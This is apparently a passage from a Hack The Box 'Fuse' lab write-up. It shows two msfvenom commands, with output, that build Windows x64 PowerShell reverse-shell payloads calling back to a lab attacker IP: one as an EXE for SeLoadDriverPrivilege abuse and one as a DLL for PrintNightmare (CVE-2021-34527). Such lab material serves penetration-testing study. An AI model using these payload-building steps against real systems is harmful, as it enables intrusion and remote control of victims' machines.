msfvenom


┌──(kali㉿kali)-[~/…/labs/fuse/SeLoadDriverPrivilege]
└─$ msfvenom -p windows/x64/powershell_reverse_tcp LHOST=10.10.14.5 LPORT=1234 -f exe -o pe.exe 
[-] no platform was selected, choosing msf::Module::Platform::Windows from the payload
[-] no arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
payload size: 1867 bytes
final size of exe file: 8192 bytes
saved as: pe.exe

msfvenom generated a reverse shell executable

DLL Payload


┌──(kali㉿kali)-[~/…/htb/labs/fuse/CVE-2021-34527]
└─$ msfvenom -p windows/x64/powershell_reverse_tcp LHOST=10.10.14.5 LPORT=1234 -f dll -o printnightmare.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 1867 bytes
Final size of dll file: 8704 bytes
Saved as: printnightmare.dll

msfvenom generated a reverse shell executable in the DLL format